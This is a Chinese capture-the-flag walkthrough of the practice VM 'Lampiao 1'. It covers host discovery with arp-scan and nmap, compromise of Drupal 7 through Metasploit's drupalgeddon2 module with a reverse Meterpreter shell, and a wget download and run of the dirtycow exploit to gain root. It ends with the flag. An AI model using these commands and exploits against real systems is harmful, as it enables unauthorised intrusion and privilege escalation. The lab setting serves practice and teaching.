靶机-Lampiao-1 渗透测试

目标

Would you like to keep hacking in your own lab?

Try this brand new vulnerable machine! “Lampião 1”.

Get root!

Level: Easy

信息收集

虚拟机运行好了后,通过 apr-scan 去查找对应的IP。

$ sudo arp-scan --interface=vmnet8 -l
Interface: vmnet8, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
172.16.214.128    00:0c:29:86:aa:2e    VMware, Inc.
172.16.214.254    00:50:56:ef:25:24    VMware, Inc.

找到对应目标IP:172.16.214.128,浏览器打开后是一堆特殊符号组成的图像,并没有什么实际的意义。

让我们用 nmap 扫描下端口:

$ nmap -vv -sV -Pn -p- --open 172.16.214.128 --reason -T4
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-20 22:13 CST
NSE: Loaded 43 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 22:13
Completed Parallel DNS resolution of 1 host. at 22:13, 13.01s elapsed
Initiating Connect Scan at 22:13
Scanning 172.16.214.128 [65535 ports]
Discovered open port 22/tcp on 172.16.214.128
Discovered open port 80/tcp on 172.16.214.128
Discovered open port 1898/tcp on 172.16.214.128
Completed Connect Scan at 22:15, 89.86s elapsed (65535 total ports)
Initiating Service scan at 22:15
Scanning 3 services on 172.16.214.128
Completed Service scan at 22:16, 59.87s elapsed (3 services on 1 host)
NSE: Script scanning 172.16.214.128.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 22:16
Completed NSE at 22:16, 6.10s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 22:16
Completed NSE at 22:16, 1.01s elapsed
Nmap scan report for 172.16.214.128
Host is up, received user-set (0.0030s latency).
Scanned at 2018-10-20 22:13:37 CST for 157s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http?   syn-ack
1898/tcp open  http    syn-ack Apache httpd 2.4.7 ((Ubuntu))

可以看到扫描结果中有一个 1898 端口开放了 Apache,我们访问它发现是一个博客网站,底部版权处写着 Powered by Drupal

接着查看页面源代码,发现在 head 处写着 <meta name="Generator" content="Drupal 7 (http://drupal.org)" />,进一步确认了该系统的 Drupal 使用的版本是 7。

获取服务器shell

首先我尝试了用 exploit-database 去搜索 Drupal 7 的可用的漏洞利用,然并卵什么用都没有。

随后尝试 msf 中的攻击模块:

msf > search Drupal
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                           Disclosure Date  Rank       Description
   ----                                           ---------------  ----       -----------
   auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Drupal OpenID External Entity Injection
   auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Drupal Views Module Users Enumeration
   exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection
   exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Drupal CODER Module Remote Command Execution
   exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Drupal Drupalgeddon 2 Forms API Property Injection
   exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Drupal RESTWS Module Remote PHP Code Execution
   exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution

这里蛮有意思的,我是首先尝试了 drupal_drupageddondrupal_coder_execdrupal_restws_exec 这几个模块,运行后都没有成功。

最后试了试 drupal_drupalgeddon2 ,卧槽成功了!!!

msf > use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898
RPORT => 1898
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.16.214.128
rhost => 172.16.214.128
msf exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 172.16.214.1:4444
[*] Drupal 7 targeted at http://172.16.214.128:1898/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Sending stage (37775 bytes) to 172.16.214.128
[*] Meterpreter session 1 opened (172.16.214.1:4444 -> 172.16.214.128:54264) at 2018-10-20 23:13:12 +0800
meterpreter >
meterpreter > ls
Listing: /var/www/html
======================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100755/rwxr-xr-x  110781   fil   2018-04-20 03:57:14 +0800  CHANGELOG.txt
100755/rwxr-xr-x  1481     fil   2018-04-20 03:57:14 +0800  COPYRIGHT.txt
100755/rwxr-xr-x  1717     fil   2018-04-20 03:57:14 +0800  INSTALL.mysql.txt
100755/rwxr-xr-x  1874     fil   2018-04-20 03:57:14 +0800  INSTALL.pgsql.txt
......

此时我们需要得到一个 meterpretermeterpretermetasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。

首先执行 meterpreter 中的指令 getuid 来查看当前权限:

meterpreter > getuid
Server username: www-data (33)

可以看到,当前我们的权限是 www-data,他并不能满足我们的目标,需要进行提取。

提权

首先通过 sysinfo 指令来确认系统内核版本:

meterpreter > sysinfo
Computer    : lampiao
OS          : Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686
Meterpreter : php/linux

很好,4.4.0-31-generic。此时执行 shell 指令,获得交互 shell 控制台。

meterpreter > shell
Process 14863 created.
Channel 2 created.

注意了,此时获取到的shell是一个不完整的交互shell,在执行提权脚本后会存在问题。比如,脚本执行成功但提示未知的错误,执行 id 查看身份时还是原来的权限。可以通过python创建一个:python -c 'import pty; pty.spawn("/bin/bash")',或者参考这篇文章

searchsploit 来搜下提权脚本:

$ ./searchsploit Ubuntu 4.4
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                                                                                                                    |  Path
                                                                                                                                                                  | (/opt/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)                                                                                   | exploits/linux/local/40759.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation                                                                  | exploits/linux_x86-64/local/40871
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)                                                                                                              | exploits/linux/dos/41457.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation                                                                                               | exploits/linux/local/41458.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation                                                             | exploits/linux_x86-64/local/40049
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation                                                                      | exploits/linux/local/39772.txt
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                                                                            | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation                                                                 | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)                                                             | exploits/linux/local/43418.c
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Shellcodes: No Result

好的,就决定是你了 Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation

$ gcc 44298.c
44298.c:17:23: fatal error: linux/bpf.h: No such file or directory
 #include <linux/bpf.h>
                       ^
compilation terminated.

好吧,目标服务器上缺失扩展,用探测脚本试试看可以用那些exp。

挨个试下来就一个可以用的( dirtycow 2),其他的要么不能编译,要么运行后就GG了。

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847.cpp
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

先去 https://www.exploit-db.com/exploits/40847/ 查看脚本如何编译以及运行。

www-data@lampiao:/$ cd /tmp
www-data@lampiao:/tmp$ wget https://www.exploit-db.com/download/40847.cpp
www-data@lampiao:/tmp$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
www-data@lampiao:/tmp$ ./dcow -s
./dcow -s
Running ...
Password overridden to: dirtyCowFun

Received su prompt (Password: )

echo 0 > /proc/sys/vm/dirty_writeback_centisecs
cp /tmp/.ssh_bak /etc/passwd
rm /tmp/.ssh_bak
root@lampiao:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@lampiao:~#
root@lampiao:~# ls
flag.txt

OK,此时已经成功拿到了 root 权限了,接着查看 flag.txt。

root@lampiao:~# cat flag.txt
9740616875908d91ddcdaa8aea3af366